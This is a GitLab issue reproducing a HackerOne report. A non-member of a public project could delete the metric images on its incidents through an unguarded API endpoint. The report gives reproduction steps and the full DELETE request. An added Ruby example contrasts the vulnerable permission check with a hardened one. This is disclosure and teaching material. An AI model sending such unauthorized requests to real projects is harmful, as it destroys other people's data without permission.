
Any GitLab user can delete all metrics images from incidents without permissions

HackerOne report #1107281 by ashish_r_padelkar on 2021-02-19, assigned to @ngeorge1:


Report

Summary

Hello,

It is possible to delete all metrics images from incidents as a non-member of a public project without any permissions. When you browse to any incident's metrics images, you won't see a delete option for them. However, it is possible for any guest user to delete these metric images using this vulnerability!

Prerequisites

Metrics images are only available on issues of the Incident type. You need to create an issue with the type set to Incident.

Steps to reproduce
  1. Log in as a guest user and go to any public project's incident metrics images, e.g. https://gitlab.com/<NameSpace>/<ProjectName>/-/issues/<ID>, and click on the Metrics tab.

  2. You won't see a Delete option because you don't have permission to delete this image.

  3. Just form a request like the one below.

DELETE /api/v4/projects/[REDACTED]/issues/5/metric_images/44 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Accept: application/json, text/plain, */*  
X-CSRF-Token: <Replace_your_csrf_Token>  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
X-Requested-With: XMLHttpRequest  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/gitlabadminuser/mvn-example/-/issues/2  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en;q=0.9  
Cookie: <Replace_Your_Cookies>

You need to supply the project ID, issue ID and metric image ID in the above request. In the above example, 23887195 is the project ID, 5 is the issue ID and 44 is the metric image ID.

  4. This will delete the metric image from the issue although you don't have access to do so!

  5. This way, you can delete all the public metrics images even if you don't have any access to the project!

What is the current bug behavior?

Non-members can delete all public metrics images without permissions!

What is the expected correct behavior?

Only reporters (or developers) should be able to delete the metrics images within their own projects.

Output of checks

This bug happens on GitLab.com

Regards,
Ashish

Impact

Any GitLab user can potentially delete all public metric images from incidents without permission.
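The root cause the report describes is that the web UI hides the Delete button but the API endpoint (DELETE /api/v4/projects/:id/issues/:iid/metric_images/:image_id) does not enforce a matching permission check, so "can see the public incident" is effectively treated as "can delete its images". The following is an added illustration and is not GitLab's own code: a minimal in-memory model of an incident with metric images, the broken check beside a hardened one. The role names, the `ROLE_RANK` ordering, the "Reporter or above" threshold (taken from the report's expected behaviour, not from GitLab source) and the fixture data are all assumptions.

```ruby
# Added example, not GitLab code. Models the missing authorization check on
# deleting incident metric images. Roles, threshold and fixture are assumed.

ROLE_RANK = { guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

class Project
  attr_reader :id, :visibility, :members

  def initialize(id, visibility:, members: {})
    @id = id
    @visibility = visibility # :public or :private
    @members = members       # { username => role symbol }
  end

  # nil when the user is not a member at all
  def role_of(user)
    @members[user]
  end
end

class Incident
  attr_reader :project, :iid, :metric_images

  def initialize(project, iid, metric_images)
    @project = project
    @iid = iid
    @metric_images = metric_images # { image_id => filename }
  end
end

class NotAuthorized < StandardError; end
class NotFound < StandardError; end

# Vulnerable behaviour as the report describes it: the only gate is whether
# the caller can *read* the incident. On a public project every user passes,
# so any authenticated non-member can delete the image.
def delete_metric_image_vulnerable(incident, user, image_id)
  raise NotFound unless incident.metric_images.key?(image_id)
  project = incident.project
  raise NotAuthorized if project.visibility == :private && project.role_of(user).nil?
  incident.metric_images.delete(image_id)
  true
end

# Hardened: read access and destructive access are separate decisions.
# Deleting requires membership at Reporter or above (assumed threshold,
# following the report's "expected behavior" section).
def can_destroy_metric_image?(project, user)
  role = project.role_of(user)
  return false if role.nil?
  ROLE_RANK.fetch(role) >= ROLE_RANK[:reporter]
end

def delete_metric_image_hardened(incident, user, image_id)
  raise NotFound unless incident.metric_images.key?(image_id)
  raise NotAuthorized unless can_destroy_metric_image?(incident.project, user)
  incident.metric_images.delete(image_id)
  true
end

# Constructed fixture (not real data): a public project with one incident
# holding one metric image, plus a maintainer, a reporter and a guest member.
def build_incident
  project = Project.new(1, visibility: :public,
                        members: { 'owner' => :maintainer, 'triager' => :reporter, 'visitor' => :guest })
  Incident.new(project, 5, { 44 => 'cpu-saturation.png' })
end

# Runs one of the two delete implementations against a fresh fixture and
# reports whether the image was deleted or the call was denied.
def attempt(impl, user)
  incident = build_incident
  send(impl, incident, user, 44)
  :deleted
rescue NotAuthorized
  :denied
end

if $PROGRAM_NAME == __FILE__
  puts "vulnerable, non-member 'nobody': #{attempt(:delete_metric_image_vulnerable, 'nobody')}"
  puts "hardened,   non-member 'nobody': #{attempt(:delete_metric_image_hardened, 'nobody')}"
  puts "hardened,   guest 'visitor':     #{attempt(:delete_metric_image_hardened, 'visitor')}"
  puts "hardened,   reporter 'triager':  #{attempt(:delete_metric_image_hardened, 'triager')}"
end
```

The point to carry into a real code base is that the check belongs in the API layer (or the policy object it calls), independent of whether the front end renders a button; a regression test for this class of bug is simply the `nobody` and `visitor` cases above expected to be denied while `triager` succeeds.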

How To Reproduce

Please add reproducibility information to this section:

Edited by Costel Maxim